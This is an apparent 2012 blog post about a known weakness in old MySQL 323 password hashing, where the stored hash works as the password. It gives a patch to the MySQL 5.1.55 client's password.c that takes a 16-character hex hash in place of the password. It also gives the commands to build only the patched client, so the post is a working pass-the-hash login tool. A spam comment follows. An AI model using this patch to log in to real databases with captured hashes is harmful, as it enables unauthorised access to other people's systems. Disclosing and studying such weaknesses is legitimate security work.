Wednesday, January 11, 2012

MySQL 323 Hash Pass-the-hash

This is just a note. This is a known old problem. If a password hash of MySQL user is hashed with OLD_PASSWORD() function or is imported from very old version, the hash is equivalent to password. You do not need to crack a hash to login to MySQL.

Here is my patch for libmysql_r/password.c for MySQL version 5.1.55.

--- password.c.orig     2012-01-11 21:32:02.644042061 +0700
+++ password.c  2012-01-11 21:33:30.676109909 +0700
@@ -191,6 +191,7 @@ void scramble_323(char *to, const char *
     char extra, *to_start=to;
     const char *message_end= message + SCRAMBLE_LENGTH_323;
     hash_password(hash_pass,password, (uint) strlen(password));
+    if (strlen(password) == 16) sscanf(password, "%8lx%8lx", &hash_pass[0], &hash_pass[1]);
     hash_password(hash_message, message, SCRAMBLE_LENGTH_323);
     randominit(&rand_st,hash_pass[0] ^ hash_message[0],
                hash_pass[1] ^ hash_message[1]);

Here the commands to build only client.

$ ./configure --without-server
$ make


  1. It’s hard to come by experienced people about this subject, but you seem like you know what you’re talking about! Thanks.
    Java Training in Bangalore